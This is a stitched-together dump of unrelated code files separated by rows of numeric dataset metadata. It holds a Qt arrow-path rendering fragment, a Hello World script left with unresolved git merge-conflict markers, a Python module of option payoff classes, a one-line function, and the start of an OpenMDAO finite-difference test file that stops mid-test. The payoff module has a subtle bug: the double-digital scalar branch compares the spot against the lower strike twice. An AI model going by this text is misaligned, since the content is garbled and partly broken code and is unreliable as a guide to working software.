if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (
dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[
2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Destination is below source
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] - vDistDst)
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
top = dstPoints[0]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, top[1])
arrival = (leftPausePoint, top[1])
direction = 0
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[
2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
def getOneComponentDownRoot(self):
"""
This function is used to locate the base component of the program.
:return: the component with id = 2; the base component for the program; the component that is one step down of the root component
:rtype: Component
"""
possibleRoot = self._dataVB.getSrcComponent()
while possibleRoot.getParent().getParent() is not None:
possibleRoot = possibleRoot.getParent()
return possibleRoot
def shape(self):
"""
Stroke the shape of the line.
:return: the arrow path
:rtype: QPainterPathStroker
"""
path, tmp, tmp1, tmp2 = self.buildPath()
stroker = QPainterPathStroker()
stroker.setWidth(50)
return stroker.createStroke(path).simplified()
def mousePressEvent(self, event: QMouseEvent):
"""
This event handler is implemented to receive mouse press events for this item.
:param event: a mouse press event
:type event: QGraphicsSceneMouseEvent
:return: None
:rtype: NoneType
"""
self._zoomable = False
self.setSelected(True)
self.scene().emitItemSelected(self._dataVB.getId())
def contextMenuEvent(self, event: QContextMenuEvent) -> None:
"""
Opens a context menu (right click menu) for the component.
:param event: The event that was generated when the user right-clicked on this item.
:type event: QGraphicsSceneContextMenuEvent
:return: None
:rtype: NoneType
"""
self.menu.exec_(event.screenPos())
| 59.576834
| 137
| 0.475843
| 8,982
| 102,353
| 5.415832
| 0.057226
| 0.088601
| 0.04319
| 0.062411
| 0.817494
| 0.805489
| 0.79445
| 0.786453
| 0.775126
| 0.767026
| 0
| 0.040169
| 0.422821
| 102,353
| 1,717
| 138
| 59.611532
| 0.783262
| 0.095659
| 0
| 0.823356
| 0
| 0
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008869
| false
| 0
| 0.005174
| 0
| 0.025129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29ce46f23a59d11d245d9671447b618c2c1183d1
| 151
|
py
|
Python
|
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
print("Hello World!")
print("Hello World!!")
<<<<<<< HEAD
print("Hello World!!!")
print("Git Branch feature-A")
print("Fix B")
>>>>>>> fix-B
feature-C
| 16.777778
| 29
| 0.609272
| 22
| 151
| 4.181818
| 0.5
| 0.326087
| 0.48913
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 151
| 8
| 30
| 18.875
| 0.681481
| 0
| 0
| 0
| 0
| 0
| 0.423841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.625
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
29e125cb3b8894e72849e926fc103b90e8c82b52
| 12,544
|
py
|
Python
|
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | null | null | null |
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | 2
|
2020-03-24T17:13:54.000Z
|
2020-03-31T03:46:06.000Z
|
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | null | null | null |
""" Module for payoff classes
series of classes for different payoff types
in C++ would have an abstract base class, and inherited payoff classes
but due to Python's duck typing simply have many payoff classes, all with a
getpayoff method
get_payoff method could instead be __call__ method, but then any abject with __call__
would be able to be used like a payoff, which could cause unexpected errors.
All Payoffs should have (at minimum) the following methods:
get_payoff()
get_strike()
clone()
__str__()
"""
import copy
import numpy as np
#import error
class CallPayOff:
""" Payoff for a call option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("CallPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a call pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
return np.maximum((spot-self._strike), 0.0)
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class PutPayOff:
""" Payoff for a put option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("PutPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a put pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
return np.maximum((self._strike-spot), 0.0)
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class DigitalPayOff:
""" Payoff for a digital option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("DisigitalPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a digital pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, (float, int)):
if spot>self._strike:
return 1.0
else:
return 0.0
elif isinstance(spot, np.ndarray):
payoff = np.zeros_like(spot)
payoff[np.where(spot>self._strike)] = 1.0
return payoff
else:
raise TypeError("spot supplied to DigitalPayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class DoubleDigitalPayOff:
""" Payoff for a double digital option """
def __init__(self,strike_lo,strike_hi):
condition = isinstance(strike_lo,(float,int)) and \
isinstance(strike_hi,(float,int))
if not condition:
raise TypeError("DoubleDigitalPayOff object initialization: strikes should be float or integer")
self._strike_lo = strike_lo
self._strike_hi = strike_hi
self._name = "a double digital pay off with strikes:"+str(self._strike_lo)+", "+str(self._strike_hi)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, (float, int)):
if spot>self._strike_lo and spot<self._strike_lo:
return 1.0
else:
return 0.0
elif isinstance(spot, np.ndarray):
payoff = np.zeros_like(spot)
payoff[np.where(spot>self._strike_lo)] = 1.0
payoff[np.where(spot>self._strike_hi)] = 0.0
return payoff
else:
raise TypeError("spot supplied to DoubleDigitalPayOff is of unsupported type")
def get_strike(self,lo=True):
""" return the strike of this payoff object
Keyword Args:
- lo: if True, return the lower strike, else return the higher strike
Returns:
- strike: the strike of the payoff according to the selection of
the lo keyword argument
"""
if lo:
return self._strike_lo
else:
return self._strike_hi
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
# class BadPayOff:
# def __init__(self,strike):
# if not isinstance(strike,(float,int)):
# raise TypeError("CallPayOff object initialization: strike should be a float or an integer")
# self._strike = strike
class ExchangePayOff:
""" Payoff for an exchange option """
def __init__(self):
self._name = "an exchange option"
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - spot[:,1],np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: None, as no strike for exchange object
"""
return None
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class SpreadPayOff:
""" Payoff for a spread option """
def __init__(self,strike):
self._name = "a spread option"
self._strike = strike
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - spot[:,1] - self._strike,np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: None, as no strike for exchange object
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class DoubleCallPayOff:
""" Payoff for an exchange option """
def __init__(self,strikes):
self._name = "a double call option"
self.strikes = strikes
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - self.strikes[0],np.zeros_like(spot[:,0]))
payoff += np.fmax(spot[:,1] - self.strikes[1],np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strikes:
"""
return self.strikes
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
| 30.520681
| 110
| 0.577726
| 1,534
| 12,544
| 4.573012
| 0.092568
| 0.047042
| 0.035923
| 0.035923
| 0.80613
| 0.80057
| 0.791447
| 0.782038
| 0.766785
| 0.753956
| 0
| 0.005543
| 0.338409
| 12,544
| 410
| 111
| 30.595122
| 0.83974
| 0.345026
| 0
| 0.741935
| 0
| 0
| 0.144775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.225806
| false
| 0
| 0.010753
| 0.037634
| 0.526882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
29ecdbd9c7b1405a5c8810bef6b6a28ca5c1ddb0
| 38
|
py
|
Python
|
samples/src/main/resources/datasets/python/22.py
|
sritchie/kotlingrad
|
8165ed1cd77220a5347c58cded4c6f2bcf22ee30
|
[
"Apache-2.0"
] | 11
|
2020-12-19T01:19:44.000Z
|
2021-12-25T20:43:33.000Z
|
src/main/resources/datasets/python/22.py
|
breandan/katholic
|
081c39f3acc73ff41f5865563debe78a36e1038f
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/datasets/python/22.py
|
breandan/katholic
|
081c39f3acc73ff41f5865563debe78a36e1038f
|
[
"Apache-2.0"
] | 2
|
2021-01-25T07:59:20.000Z
|
2021-08-07T07:13:49.000Z
|
def power5():
return 2 ** (3 + 4)
| 12.666667
| 23
| 0.473684
| 6
| 38
| 3
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0.315789
| 38
| 2
| 24
| 19
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d99bc323ca600b17e764c74a4970822b89054bfa
| 90,564
|
py
|
Python
|
openmdao/core/tests/test_approx_derivs.py
|
jbergeson/OpenMDAO
|
50df8f5888c6499a0ef66b836ee63b122a50aaae
|
[
"Apache-2.0"
] | null | null | null |
openmdao/core/tests/test_approx_derivs.py
|
jbergeson/OpenMDAO
|
50df8f5888c6499a0ef66b836ee63b122a50aaae
|
[
"Apache-2.0"
] | 1
|
2018-06-18T15:09:10.000Z
|
2018-06-18T15:09:10.000Z
|
openmdao/core/tests/test_approx_derivs.py
|
bbrelje/OpenMDAO
|
58f9ff47197531f4fb4ef632c6bcca11e799ccf0
|
[
"Apache-2.0"
] | null | null | null |
""" Testing for group finite differencing."""
import itertools
import unittest
try:
from parameterized import parameterized
except ImportError:
from openmdao.utils.assert_utils import SkipParameterized as parameterized
import numpy as np
import openmdao.api as om
from openmdao.test_suite.components.impl_comp_array import TestImplCompArray, TestImplCompArrayDense
from openmdao.test_suite.components.paraboloid import Paraboloid
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, \
SellarDis2withDerivatives, SellarDis1CS, SellarDis2CS
from openmdao.test_suite.components.simple_comps import DoubleArrayComp
from openmdao.test_suite.components.unit_conv import SrcComp, TgtCompC, TgtCompF, TgtCompK
from openmdao.test_suite.groups.parallel_groups import FanInSubbedIDVC
from openmdao.test_suite.parametric_suite import parametric_suite
from openmdao.utils.assert_utils import assert_near_equal
from openmdao.utils.general_utils import set_pyoptsparse_opt
from openmdao.utils.mpi import MPI
import time
try:
from openmdao.parallel_api import PETScVector
vector_class = PETScVector
except ImportError:
vector_class = om.DefaultVector
PETScVector = None
# check that pyoptsparse is installed
# if it is, try to use SNOPT but fall back to SLSQP
OPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')
if OPTIMIZER:
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
class TestGroupFiniteDifference(unittest.TestCase):
def test_paraboloid(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(model._approx_schemes['fd']._exec_dict), 2)
def test_fd_count(self):
# Make sure we aren't doing extra FD steps.
class ParaboloidA(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.add_output('g_xy', val=0.0)
# makes extra calls to the model with no actual steps
self.declare_partials(of='*', wrt='*', method='fd', form='forward', step=1e-6)
self.count = 0
def compute(self, inputs, outputs):
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
g_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
outputs['g_xy'] = g_xy * 3
self.count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=3.0))
model.add_subsystem('py', om.IndepVarComp('y', val=5.0))
model.add_subsystem('parab', ParaboloidA())
model.connect('px.x', 'parab.x')
model.connect('py.y', 'parab.y')
model.add_design_var('px.x', lower=-50, upper=50)
model.add_design_var('py.y', lower=-50, upper=50)
model.add_objective('parab.f_xy')
prob.setup()
prob.run_model()
J = prob.compute_totals(of=['parab.f_xy'], wrt=['px.x', 'py.y'])
# print(J)
# 1. run_model; 2. step x; 3. step y
self.assertEqual(model.parab.count, 3)
self.assertEqual(model.parab.iter_count_without_approx, 1)
self.assertEqual(model.parab.iter_count, 1)
self.assertEqual(model.parab.iter_count_apply, 2)
def test_fd_count_driver(self):
# Make sure we aren't doing FD wrt any var that isn't in the driver desvar set.
class ParaboloidA(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.add_output('g_xy', val=0.0)
self.count = 0
def compute(self, inputs, outputs):
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
g_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
outputs['g_xy'] = g_xy * 3
self.count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=3.0))
model.add_subsystem('py', om.IndepVarComp('y', val=5.0))
model.add_subsystem('parab', ParaboloidA())
model.connect('px.x', 'parab.x')
model.connect('py.y', 'parab.y')
model.add_design_var('px.x', lower=-50, upper=50)
model.add_objective('parab.f_xy')
model.approx_totals(method='fd')
prob.setup()
prob.run_model()
prob.driver._compute_totals(of=['parab.f_xy'], wrt=['px.x'], use_abs_names=True)
# 1. run_model; 2. step x
self.assertEqual(model.parab.count, 2)
def test_paraboloid_subbed(self):
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', om.Group(), promotes=['x', 'y', 'f_xy'])
sub.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
sub.approx_totals()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['fd']._exec_dict), 2)
def test_paraboloid_subbed_in_setup(self):
class MyModel(om.Group):
def setup(self):
self.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
self.approx_totals()
prob = om.Problem()
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', MyModel(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
prob.setup(check=False, mode='fwd')
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
